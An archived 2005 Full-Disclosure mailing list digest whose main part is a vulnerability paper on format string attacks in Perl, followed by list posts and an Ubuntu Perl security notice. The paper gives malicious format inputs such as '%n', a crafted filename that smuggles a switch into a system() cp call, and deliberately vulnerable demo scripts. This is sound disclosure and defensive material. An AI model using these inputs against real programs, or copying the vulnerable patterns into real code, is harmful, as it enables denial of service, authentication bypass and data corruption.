days, Jack Louis of Dyad Security reported on a format string issue in a Webmin application that is written in Perl (CVE-2005-3912). He further showed how a problem in the Perl interpreter itself could allow modification of memory and code execution in vulnerable apps (CVE-2005-3962). This paper focuses on format string vulnerabilities at the application level. It must be emphasized that even if the interpreter problem is fixed, the impact of format string vulnerabilities will only be reduced, not completely eliminated. Excluding problems within the interpreter itself, Perl application format string vulnerabilities can allow denials of service (primarily memory or disk consumption), information leaks, and modification of program variables in ways that may have security implications. In particular, the sprintf() and printf() functions in Perl can be abused if an attacker can control the contents of the format string. Since similar functions are used in C, it is possible that these functions will be used more frequently by C programmers who are new to Perl. It should be noted that Perl's taint checker does not catch some variants of format string attacks. The behavior differs in Perl 5.004 and 5.6.1 (5.6.1 can identify additional dangerous inputs). However, modifying the taint checker itself may not be feasible or even appropriate. ********************************************************************** 2. Relevant History and Credits ********************************************************************** Jean-loup Gailly independently discovered and reported a format string problem in a Perl application on September 26, 2002 [1]. Arjan de Vet included format strings and the taint checker in a presentation at YAPC:Europe in August 2001 [2]. Steve Christey mentioned the possibility of format strings in PHP applications on April 3, 2003 [3] and format strings in interpreted languages during a lightning round talk on vulnerability research gaps at CanSecWest in April 2004 [4]. Jack Louis reported on a format string problem in a Perl application on November 29, 2005 [5], following it with a description of an integer wrap within Perl itself that was exploitable via format strings on December 1, 2005 [6]. The most notable early research on format strings in C was performed by Tim Newsham in September 2000 [7]. ********************************************************************** 3. Attack and Impact Details ********************************************************************** Following are some of the more dangerous specifiers, along with their implications. 1) Memory or disk consumption The "%s" specifier, and others that allow field widths to be defined, can be used to consume a large amount of CPU, memory, and/or disk, e.g. "%99999s". ("%999999999s" is sufficient to consume a gigabyte of memory or disk, but it has been reported that it can also cause the Perl program to crash.) 2) Modification of variables Using the "%n" specifier, the attacker can modify the values of certain variables that are provided as arguments to print/sprintf, possibly altering program behavior in ways that have security implications. The variable is modified to a number, generally a 0. The implications of this problem depend on how the program uses the variables. Consider the following pseudo-code for an authentication routine: $input = GetInputFromUser(); if (UserHasAuthenticated($user)) { $a = 0; } else { $a = 1; } $str = sprintf($input, $a); if ($a) { PromptUserToAuthenticate($user); } else { DoThingThatOnlyUsersShouldDo($user); } If $input is "%10s", then str is formatted with up to 10 spaces of padding and $a is not modified; but if $input is "%n", then $a is changed to 0, and the attacker effectively bypasses the check for authentication. 3) Argument shifting The "%p" specifier formats a pointer for the next argument to be processed in the call to *printf. This effectively misdirects or shifts all remaining arguments to different format specifiers than the programmer intended. The impact depends on the specific bug. Argument shifting could also be used to bypass cleansing operations for other vulnerabilities, by shifting uncleansed values into variables that contain cleansed values. 4) Altering intended outputs Any format specifier can alter the intended format of structured output. This in turn could corrupt files or enable the exploitation of vulnerabilities in other applications that process such output. For example, the '%p' specifier, which prints out a pointer value, could be used to generate integer values that exceed the expected range of inputs. Example: $index = GetUserInput(); if (($index > 32) || ($index < 0)) { print STDERR "Error: Index must be between 0 and 32."; } ($sec,$min,$hour,$mday,$mon,$year) = gmtime(time); printf DATABASE, "$index %4d/%02d/%02d %02d:%02d:%02d\n", $year+1900, $mon+1, $mday; If $index is "1", then the result might be: 1 2002/10/01 06:58:42 But if $index is "%p", the error condition is not detected (since the string evaluates to 0), and the result would be: 130690 10/01/06 58:42:00 Here, not only does the 'index' value exceed the maximum of 32, but all the other values are wrong! This is because the %p was used to format a pointer to the $year+1900 expression. All the other arguments were then misdirected, and applied to the wrong format specifier. Thus the month value is formatted as the year, the seconds value is formatted as the minute, etc. 5) Bypassing cleansing operations Cleansing operations that remove spaces could be tricked by using "%2s" or other format specifiers that generate spaces. Programs may try to remove spaces when passing arguments to commands, or formatting data. Here's one example: opendir(DIR, "."); while ($file = readdir(DIR)) { if ($file =~ /\s/) { print STDERR "Warning: '$file' has spaces, replacing with _\n"; $file =~ s/\s/_/g; } if ($file =~ /^-(fiprR)+$/) { print STDERR "Warning: '$file' matches switches for /bin/cp!\n"; # skip this one. next; } $backup = sprintf("$file.bak"); # C programmers might do this system("/bin/cp $file $backup"); # but this *is* just an example } closedir(DIR); If $file is set to "-R%2ssubdir", then the check for "dangerous switches" would fail, and the resulting system call would be: system("/bin/cp -R subdir subdir.bak"); 6) Other Attack Scenarios Some feasible attack scenarios involve Perl programs that generate log messages or reports: - File names containing format specifiers could alter which files are processed - IP addresses whose DNS reverse lookup includes format strings could be returned as the result of gethostbyname(). Log files could be filled easily using "%999s" style strings. The possibility of CRLF injection was theorized, but a casual investigation was not successful. ********************************************************************** 4. Some Discussion on Format Strings and the Taint Checker ********************************************************************** In 5.004: The taint checker apparently does not flag filenames as tainted (e.g. as obtained from the readdir() function). Presumably, other types of "indirect input" may not be tainted. However, it does identify more direct sources of input such as stdin and environment variables. In 5.6.1: Filenames are tainted, and the taint checker terminates the program. While the program is safe from exploitation through dangerous calls, there is still a denial of service, which could be a problem with critical code that is expected to fully complete its task, such as a log processing program (although the programmer should take the possibility of failure into account while running in taint mode anyway!) Note that the taint checker does not exit until a *printf-tainted variable is passed to a dangerous call such as system(). So, if the program is not tested with specifiers such as '%n' (which modifies an argument to *printf), then the taint check may not be discovered. Attacks such as resource consumption and data format modification will still work; however, changing the taint checker to exit as soon as the printf/sprintf is encountered could break existing programs. This is a factor though: "testing" sprintf/printf with normal file names won't directly trigger the taint checker, unless %n is actually included in the filename; so, if the programmer tests the Perl code, but does not include the '%n' option, they won't necessarily find the taint error. However, a later input with '%n' could cause the program to halt unexpectedly due to the taint error. Note: the taint checker doesn't complain when system() is called with arguments in the following fashion: system("/bin/echo", $tainted_var1, $tainted_var2); The following example properly generates an error from the taint checker, using input from stdin: $a = ; chomp($a); $str = sprintf("$a.txt"); system("/bin/echo $str"); The following example also generates an error from the taint checker, using input from a directory listing: opendir(DIR, "."); while ($file = readdir(DIR)) { system("/bin/echo $file"); } closedir(DIR); Original bug report: http://rt.perl.org/rt2/Ticket/Display.html?id=17698 http://www.nntp.perl.org/group/perl.perl5.porters/67239 Statement From Perl Language Developer -------------------------------------- These issues do not represent a substantial security hole in perl itself. Future versions of perl may extend tainting checks to format strings, or just to certain aspects of formats (such as %n). ********************************************************************** 5. Real-World Vulnerable Program Examples ********************************************************************** In 2002, at least 3 different Perl programs were found vulnerable to format string attacks: 1) ftplogcheck 2) perl-nocem 3) WASD OpenVMS web server ftplogcheck ----------- ftplogcheck is a program used for processing wu-ftpd logs and generating statistics. It is not part of the wu-ftp distribution. One portion of ftplogcheck report lists which files were uploaded to the server by the "anonymous" user. The code is: printf REPORT "$time $host $filesize $filename $name\n"; If the wu-ftp server is configured to allow uploads from anonymous users, then attackers can upload files whose names contain malicious format strings, which are then fed into the $filename variable. In this case, the attacker could consume memory or disk space by causing an extremely large report to be generated (if $filename is "%999999s") or misrepresent the name of the file that has been uploaded (if $filename is "word1%1sword2", which would generate the string "word1 word2"). The original developer is: koos at pizza.hvu.nl http://idefix.net/~koos/ftp.html [ftp://ftp.cetis.hvu.nl/pub/koos/ftplogcheck is apparently down] This program is archived at: http://www.landfield.com/software/ftp.landfield.com/wu-ftpd/tools/ftplogcheck perl-nocem ---------- perl-nocem is a script that was apparently suggested for inclusion in INN 2.0 beta, but it was not directly distributed with INN 2.3.3 or any 2.x version. http://www.isc.org/ml-archives/inn-workers/2001/05/msg00177.html This script processes NoCeM notices, which can be used by the server to process third-party, PGP-signed article cancellation notices. In do_nocem(), a call is made to sprintf() after inserting the values of the $nid and $issuer variables into the format string: logmsg(sprintf("processed notice $nid by $issuer" . " ($nr ids, %.5f s, %.1f/s)", $diff, $nr / $diff)); The value of $nid is obtained from a "notice-id" news article header. It is not sanity-checked; therefore, malicious format strings can be inserted into this sprintf() call. The $issuer variable is obtained from an "issuer" header, but this value must be allowed by the perl-nocem control file. It may be possible to use a wildcard character and match any issuer. The $nr variable contains the total number of articles to be canceled, and the $diff variable attempts to measure the amount of time required to cancel the articles, generally 0.01 due to an apparent bug. According to the developer, the scope of this attack is limited: "the message is printed only after the nocem notice has been PGP-verified, so the attacker must be one of the trusted cancellers." Typical input Assume that 10 articles are to be canceled ($nr = 10) and $diff is 0.01. With a $nid (Notice-ID header) of "NID" and a $issuer (Issuer header) of "ISSUER at example.com", the log message output would be: processed notice NID by ISSUER at example.com (10 ids, 0.01000 s, 1000.0/s) Memory/disk consumption With a Notice-ID of "%9999999s", a large amount of memory and/or log file space is consumed: processed notice [etc.] Modification of the $diff variable With a notice-id of "%n", perl-nocem changes the $diff variable to 17 (the length of the "processed notice " substring), as opposed to its original value (typically 0.01). This changes the error message to misrepresent how long it took to cancel the articles: processed notice by ISSUER at example.com (10 ids, 1000.00000 s, 0.0/s) (notice the double-space in "notice by" where the notice-id would be). Note that if perl-nocem had used a format string that began with the "$nid" variable (e.g. "$nid notice processed" instead of "processed notice $nid"), then the $diff variable would have been set to 0, and the "$nr / $diff" expression would have caused the program to exit with a division-by-zero error. Other output modifications With a notice-id of "%p", the resulting log message would be like: processed notice 130498 by [ISSUER] (10 ids, 0.50000 s, 0.0/s) where the "130498" is an incorrect notice id. Developer statement: [This is] not easily exploitable, the message is printed only after the nocem notice has been PGP-verified, so the attacker must be one of the trusted cancellers. Solution: WASD ---- Jean-loup Gailly suggested the presence of a format string issue in the WASD OpenVMS web server [1]. A sample program, PerlRTE_example1.pl, contained the following vulnerable code: printf ("$name=\"$ENV{$name}\"\n"); where the $name variable can be altered by an attacker to contain format strings (e.g. through a query string). ************************************************************************ 6. Avoiding Format String Vulnerabilities During Development ************************************************************************ When writing Perl programs, follow these guidelines. 1) Use constant strings for formatting. 2) Do not feed Perl variables directly into format strings, e.g. "$bad %10s" or $bad . " %10s" 3) Where possible, avoid using printf and sprintf 4) If absolutely necessary, consider quoting the "%" specifier before including a user-controlled input into a format string. 5) Run your program with taint checking enabled, which can help protect against many of the problems identified here. Notes on Detecting Vulnerabilities in Source Code ------------------------------------------------- Detection of suspicious code is slightly more difficult than it is for C code. Constant strings can contain Perl entities such as variables or references, which are inserted into the string before it is passed to printf/sprintf. $fmt = ; printf("THIS IS A POTENTIALLY VULNERABLE $fmt FORMAT STRING\n"); ************************************************************************ 7. Suggestions for Further Research ************************************************************************ This paper is not an exhaustive work, so further research is needed. Software developers and vulnerability researchers are encouraged to actively search for format string issues in all programming languages, not just C and Perl. Suggested research topics include: - for each programming language, identify and publicize all builtin or common library functions that use format strings. - extend source and binary code analysis tools to look for improper use of these functions - audit individual applications that have been previously deemed free of obvious vulnerabilities, with a focus on format strings - study the implications of interactions between a high-level language and the language it is implemented in. For example, there may be format string analogues to the problems of the null byte in Perl and PHP programs and their interaction with the underlying C code. - further examination of the taint checker (see below) Note: in the author's limited experience, format string vulnerabilities do not appear as frequently in Perl or PHP applications as they do in C programs. However, more focused efforts are needed before this suspicion can be confirmed. ********************************************************************** 8. Demonstration Programs ********************************************************************** These programs demonstrate some the problems described above. 1) Argument modification #!/bin/env perl # when run with taint checking (-T), this seems to properly barf about # dependency errors (try a "clean" format string like "5s%s%s" vs. a # dirty one with a "%n" in it). $ENV{"PATH"} = ""; # try as input: "%s%n%s" --> modifies $b $a = "A"; $b = "B"; $c = "C"; $x = sprintf($ARGV[0], $a, $b, $c); print "\$a='$a'; \$b='$b'; \$c='$c'\n"; print "$x\n"; system("/bin/echo $a $b $c"); ************** End Sample Vulnerable Program ************** ********* Sample 2 ********** # Create a directory that contains files with these names: # X%10sX # %p # %s # abc%ndef # This was gleaned from some real-world code, but the print was # changed to printf. # Change what filenames are processed via format strings in # the filenames, such as a file named "%p%n" # # You can "erase" a filename by using '%s', and having this "blank" # filename could throw off the argument count to system or exec calls, # which could alter behavior. Consider a backup command like # exec("/bin/cp", file1, file2) where file1 can be "blanked" out # # Similarly, you could "erase" portions of a filename with "%n" or # "%s". The filename ABC.TXT would be equivalent to ABC%n.%nTXT # # You can create very long filenames by using '%999s' (for example). opendir(DIR, "."); while ($file = readdir(DIR)) { print "Real filename: $file\n"; printf "Filename in format string: $file\n\n"; } closedir(DIR); 2) Misuse of format string in log processing, for which many Perl programs have been written. Could cause larger strings than expected to be written to files or sent to processes; code that depends on well-formatted input from the program may be subject to buffer overflow or other issues. I've seen several programs that do something like this: printf "A=$a\n" ******** End Sample 2 ************ ********************************************************************** 9. References ********************************************************************** [1] Jean-loup Gailly "remote SYSTEM compromise in WASD OpenVMS http server" Bugtraq post September 26, 2002 http://marc.theaimsgroup.com/?l=bugtraq&m=103307640806862&w=2 [2] Arjan de Vet "Security aware programming with Perl" http://www.madison-gurkha.com/publications/yapc2001/text0.htm [3] Steve Christey "An Alternate View of Recently Reported PHP Vulnerabilities" Bugtraq http://seclists.org/lists/bugtraq/2003/Apr/0085.html [4] http://www.cansecwest.com/archives.html [5] Jack Louis "Webmin miniserv.pl format string vulnerability" November 29, 2005 http://lists.immunitysec.com/pipermail/dailydave/2005-November/002685.html [6] Jack Louis "Perl format string integer wrap vulnerability" December 1, 2005 http://marc.theaimsgroup.com/?l=full-disclosure&m=113345191421286&w=2 [8] WASD PerlRTE_example1.pl http://wasd.vsm.com.au/ht_root/src/perl/readmore.html [9] perl-nocem: http://www.isc.org/ml-archives/inn-workers/2001/05/msg00177.html [10] INN-workers security report http://marc.theaimsgroup.com/?l=inn-workers&m=103643921519928&w=2 http://marc.theaimsgroup.com/?l=inn-workers&m=103644050021431&w=2 ********************************************************************** 10. Disclosure History ********************************************************************** Jun 10, 2002 - Theorized issue; began discovery and investigation; search for potentially vulnerable programs initially unsuccessful Sep 26, 2002 - Jean-loup Gailly (jloup at gailly.net) posts Perl format string problem in OpenVMS Sep 28, 2002 - deeper investigation into format specifiers, other vulnerable programs Sep 30, 2002 - more writing on security advisory; investigated whether taint checker did "the right thing" Sep 30, 2002 - tried to find a way to report a security vuln to Perl developers (in case taint issue is a Perl bug, and to consult on possibility of buffer overflows). Registered to site, only to be told by a web page to email my report to a certain address. Left out details in the email because I had no idea who would be viewing the report at that address. This turned out to be a good decision, as that post has been publicly archived. Sep 30, 2002 - investigated taint checker issues, %p Sep 30, 2002 - initial response from Perl contact (within 50 minutes) saying it was OK to post details to that address, gave an alternate POC just in case. Oct 1, 2002 - provided Perl developer list with details Oct 1, 2002 - notified CERT/CC Oct 8, 2002 - sent followup inquiry to Perl developer list and primary Perl POC; haven't heard anything back, do they plan to modify the taint checker? Oct 10, 2002 - asked a colleague to try contacting Perl developers Oct 11, 2002 - response from hv at crypt.org saying that message had not been forwarded to the mailing list. Replied to various points; suggested possible statement on taint checker. Oct 17, 2002 - Statement modified and approved from hv at crypt.org Nov 1, 2002 - notified Mark.Daniel at wasd.vsm.com.au (WASD developer) http://wasd.vsm.com.au/ht_root/src/perl/readmore.html Nov 1, 2002 - more investigation into perl-nocem Nov 1, 2002 - notified perl-nocem author, Marco d'Itri (md at linux.it) Nov 3, 2002 - received acknowledgement from perl-nocem author Nov 3, 2002 - received acknowledgement from WASD author, approval to release Dec 5, 2002 - inquiry to perl-nocem author; are patches available? Dec 5, 2002 - perl-nocem patches had been made Dec 5, 2002 - investigation of ftplogcheck Dec 19, 2002 - refined advisory, cleaned up demonstration code Nov 29, 2005 - posted to DailyDave Dec 1, 2005 - Jack Louis releases Perl integer wrap advisory Dec 2, 2005 - further edits, table of contents, enhancement of argument shifting Dec 2, 2005 - posted to Bugtraq, Full-Disclosure From mike.benjamin at clarinet.com.au Fri Dec 2 09:21:17 2005 From: mike.benjamin at clarinet.com.au (Michael L. Benjamin) Date: Fri, 2 Dec 2005 17:21:17 +0800 Subject: [Full-disclosure] Most common keystroke loggers? Message-ID: Although not particularly secure, this is an interesting method I saw in use recently. First you enter your account number, then... Say your PIN is 0467 they present the screen to the user like this (as an image): +---+---+---+---+---+---+---+---+---+---+ | 0 | 1 | 2 | 3 | 4 | 6 | 6 | 7 | 8 | 9 | +---------------------------------------+ | H | A | S | B | E | J | O | W | V | X | +---+---+---+---+---+---+---+---+---+---+ In the password field you enter the corresponding letter to your PIN. Obviously the corresponding letters are generated prior to the web page being served, and the server-side is aware of the equivalent value. So in this case your PIN transposes to "H E O W", you type that in. The server checks this, and transposes it back to your pin of "0 4 6 7" and verifies the user. Now, a keylogger is going to capture "H E O W". Without any additional smarts and knowing what appeared on the screen during the session, the keylogger is useless for determining the PIN. This will stop any non-targetted keyloggers. It's possible a hacker could write a specific keylogger to grab the image from the page and work out what the numbers/alphas are, but it becomes a more involved process and is specific to the website it is targetted at. Overall an improvement on most sites. M. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Shannon Johnston Sent: Friday, December 02, 2005 01:25 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Most common keystroke loggers? Hi All, I'm looking for input on what you all believe the most common keystroke loggers are. I've been challenged to write an authentication method (for a web site) that can be secure while using a compromised system. Thanks, Shannon _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From CNQQTROVMYSY at spammotel.com Fri Dec 2 09:34:55 2005 From: CNQQTROVMYSY at spammotel.com (CNQQTROVMYSY at spammotel.com) Date: Fri, 02 Dec 2005 10:34:55 +0100 Subject: [Full-disclosure] (no subject) Message-ID: <1133516697.CNQQTROVMYSY@spammotel.com> The original message was received Mon, 21 Nov 2005 07:50:14 +0100 from - ----- The following address(es) had permanent fatal errors ----- ; originally to CNQQTROVMYSY at spammotel.com (unrecoverable error) The mail system encountered a delivery failure, code -11. This failure could be due to circumstances out of its control, please check the transcript for details -------------- next part -------------- An embedded message was scrubbed... From: joey at infodrom.org (Martin Schulze) Subject: [Full-Disc]: [Full-disclosure] [SECURITY] [DSA 811-2] New common-lisp-controller Date: Mon, 21 Nov 2005 07:53:56 +0100 (CET) Size: 4430 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/05106b3a/attachment.mht From aksecurity at hotpop.com Fri Dec 2 08:34:30 2005 From: aksecurity at hotpop.com (Amit Klein (AKsecurity)) Date: Fri, 02 Dec 2005 10:34:30 +0200 Subject: [Full-disclosure] Re: [DRUPAL-SA-2005-008] Drupal 4.6.4 / 4.5.6 fixes XSS and HTTP header injection issue In-Reply-To: <20051201154558.GB18510@aragorn> Message-ID: <43902336.8387.5A50F8@localhost> On 1 Dec 2005 at 16:45, Uwe Hermann wrote: > ---------------------------------------------------------------------------- > Drupal security advisory DRUPAL-SA-2005-008 > ---------------------------------------------------------------------------- > Advisory ID: DRUPAL-SA-2005-008 > Project: Drupal core > Date: 2005-11-30 > Security risk: less critical > Impact: normal > Where: from remote > Vulnerability: XSS, HTTP header injection > ---------------------------------------------------------------------------- > > Description > ----------- > Paul Laudanski informed us that it's possible to attach files that are able > to run Javascript under Internet Explorer. > > Further investigation of the problem revealed that the same method can be > used to inject arbitrary HTTP headers. > Would this injection be in the context of the HTTP response stream (i.e. HTTP Response Splitting?) -Amit From rs2321 at gmail.com Fri Dec 2 11:24:25 2005 From: rs2321 at gmail.com (R S) Date: Fri, 2 Dec 2005 16:54:25 +0530 Subject: [Full-disclosure] Re: SOX whistleblowers' clause Compliance In-Reply-To: References: <2be58a30511302258i455d92f0o8d3fa7a5a4884bea@mail.gmail.com> Message-ID: <2ba066b20512020324p32da5511o8fd482280b75d86f@mail.gmail.com> On 12/2/05, Aditya Deshmukh wrote: > > > > > > Why cant you use google to find out this ? > > > > The same reason you can't use Google and find your answer fuckbag. > > Are you n3td3v ? In the spirit of full-disclosure I support anyone's [doesn't matter if it is a troll like infosecbofh or netdev] right to express their opinion, but turning abusive should be a reason enough to be kicked off any public mailing list. I have already filtered out these people, but I still get to read some of the abusive emails because some others feel that these people deserve a reply. Can the moderator please issue a warning to these abusive trolls? Also is it too much to ask the "great security minds" in this list to contain their need to reply to these trolls? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/845f32c9/attachment.html From jasher1 at tampabay.rr.com Fri Dec 2 11:55:07 2005 From: jasher1 at tampabay.rr.com (Jesse W. Asher) Date: Fri, 02 Dec 2005 06:55:07 -0500 Subject: [Full-disclosure] SOX whistleblower requirements challenged in court? (Was SOX whistleblowers' clause Compliance) In-Reply-To: References: Message-ID: <4390361B.2080604@tampabay.rr.com> I was curious about the mention of "the SOX whistleblowers requirements have been challenged in court". Can anyone provide more information on this? What has challenged and why? Thanks!! >>From: Madison, Marc [mailto:mmadison at fnni.com] >>IANAL, But IMO use an Intranet web page that allows employees >>to submit >>anonymous html post to the web server via html. Now if your security >>policy is pervasive then surely auditing is enabled on all >>your systems, >>thus removing any anonymity this would have provided. Have you >>considered, dare I say, outsourcing? I only say this since >>part of the >>requirement calls for the company to provide sufficient anonymity to >>individuals reporting issues. By the way the SOX whistleblowers >>requirements have already been challenged in court so there might be >>precedence on what is sufficient. >> >> From mohit.muthanna at gmail.com Fri Dec 2 12:30:53 2005 From: mohit.muthanna at gmail.com (Mohit Muthanna) Date: Fri, 2 Dec 2005 07:30:53 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: Shannon, Why don't you try http://www.teleauth.com? It's a two-factor authentication service that can be easily plugged into your applications. It authenticates users by calling them on their phone and requesting a PIN code. It's easy to use and free. There's also PAM modules for UNIX and UNIX-like systems, a Ruby module, a Drupal module, and some others that I can't think of at the moment. Mohit. On 12/1/05, Shannon Johnston wrote: > Hi All, > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. > > Thanks, > Shannon > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Mohit Muthanna [mohit (at) muthanna (uhuh) com] "There are 10 types of people. Those who understand binary, and those who don't." From martin.pitt at canonical.com Fri Dec 2 13:23:20 2005 From: martin.pitt at canonical.com (Martin Pitt) Date: Fri, 2 Dec 2005 14:23:20 +0100 Subject: [Full-disclosure] [USN-222-1] Perl vulnerability Message-ID: <20051202132320.GC6589@piware.de> =========================================================== Ubuntu Security Notice USN-222-1 December 02, 2005 perl vulnerability CVE-2005-3962 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: perl-base The problem can be corrected by upgrading the affected package to version 5.8.4-2ubuntu0.5 (for Ubuntu 4.10), 5.8.4-6ubuntu1.1 (for Ubuntu 5.04), or 5.8.7-5ubuntu1.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Jack Louis of Dyad Security discovered that Perl did not sufficiently check the explicit length argument in format strings. Specially crafted format strings with overly large length arguments led to a crash of the Perl interpreter or even to execution of arbitrary attacker-defined code with the privileges of the user running the Perl program. However, this attack was only possible in insecure Perl programs which use variables with user-defined values in string interpolations without checking their validity. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-2ubuntu0.5.diff.gz Size/MD5: 60449 138a02883a2dbe7a64ab04afdd66e9d9 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-2ubuntu0.5.dsc Size/MD5: 727 703d3ffd2a87bde7c541c6e8e837aadb http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4.orig.tar.gz Size/MD5: 12094233 912050a9cb6b0f415b76ba56052fb4cf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.4-2ubuntu0.5_all.deb Size/MD5: 37058 bd3315452eecd9d428dabe16e53f2ded http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.4-2ubuntu0.5_all.deb Size/MD5: 7049780 5786917c60337ce874fe75bd3356ca12 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.4-2ubuntu0.5_all.deb Size/MD5: 2181250 7c97e5758dfff350f684ba84aab0a2dc amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.4-2ubuntu0.5_amd64.deb Size/MD5: 605446 b75c1a5bf7e1663f74c99fe3b42ceab7 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.4-2ubuntu0.5_amd64.deb Size/MD5: 1030 010890e33535d7a9b5f3c29fb18c2278 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.4-2ubuntu0.5_amd64.deb Size/MD5: 787320 7028286655aa8f1583cbc33de1769810 http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.4-2ubuntu0.5_amd64.deb Size/MD5: 3819880 c0234ca782a1821ceb46a6e3f31c5040 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.4-2ubuntu0.5_amd64.deb Size/MD5: 32838 298ae33f6e488bb5676358862672bf7d http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-2ubuntu0.5_amd64.deb Size/MD5: 3834290 ea9cb2fe0d5da2cf9f41280d82af236f i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.4-2ubuntu0.5_i386.deb Size/MD5: 546916 c1696ad6b6cc8b135ef8b9b3c4d641dc http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.4-2ubuntu0.5_i386.deb Size/MD5: 494116 6969f99be7a08e72397f88141cf792fa http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.4-2ubuntu0.5_i386.deb Size/MD5: 727682 8df403b46255458380f8f1cc470695cf http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.4-2ubuntu0.5_i386.deb Size/MD5: 3631196 8b2c590421d6fb1990c10cbbd082127e http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.4-2ubuntu0.5_i386.deb Size/MD5: 30812 e59daea11508610cce6fbfe1d1d27352 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-2ubuntu0.5_i386.deb Size/MD5: 3229772 b29f36a2a1d486b13b021785ae7416e4 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.4-2ubuntu0.5_powerpc.deb Size/MD5: 561030 3d81dd76a5b743776b4c8b9596199075 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.4-2ubuntu0.5_powerpc.deb Size/MD5: 1036 febc4be8e86ba57988038b2245098602 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.4-2ubuntu0.5_powerpc.deb Size/MD5: 718498 5e1d9871793e853806968c95d065da8c http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.4-2ubuntu0.5_powerpc.deb Size/MD5: 3817110 71b313d4d4e8fbaf159c570ca8a67ccc http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.4-2ubuntu0.5_powerpc.deb Size/MD5: 30564 869d07e824d69d9eb729ffac2ee3e307 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-2ubuntu0.5_powerpc.deb Size/MD5: 3477134 5bc641ebc225d4df2d758a27bc4b076d Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-6ubuntu1.1.diff.gz Size/MD5: 85222 f860ad98b388fe9b8bb86cc7e35345c7 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-6ubuntu1.1.dsc Size/MD5: 744 a7ed7714ee125e9ef47ad3815ef631d9 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4.orig.tar.gz Size/MD5: 12094233 912050a9cb6b0f415b76ba56052fb4cf Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.4-6ubuntu1.1_all.deb Size/MD5: 37848 e127ed7dfc844352edc5decfce571304 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.4-6ubuntu1.1_all.deb Size/MD5: 7050018 04f464518415aba917f23fb92aa2c692 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.4-6ubuntu1.1_all.deb Size/MD5: 2178096 dd899c9f55a68afd7b9fbfd20be24e6d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.4-6ubuntu1.1_amd64.deb Size/MD5: 605492 e7ced10f4d56325865215644ca3cf206 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.4-6ubuntu1.1_amd64.deb Size/MD5: 1032 0de0991b480a41be576e0eb314cf9076 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.4-6ubuntu1.1_amd64.deb Size/MD5: 791098 48622e7501239e1bf514a478958e641f http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.4-6ubuntu1.1_amd64.deb Size/MD5: 3825826 86680f4b3ec293e8ff7d6766aa8e34fc http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.4-6ubuntu1.1_amd64.deb Size/MD5: 32840 9087597015a77995be3fae92dc8875dd http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.4-6ubuntu1.1_amd64.deb Size/MD5: 3833986 0e950b7f25c2c2d133cdc5deeed083bc i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.4-6ubuntu1.1_i386.deb Size/MD5: 547172 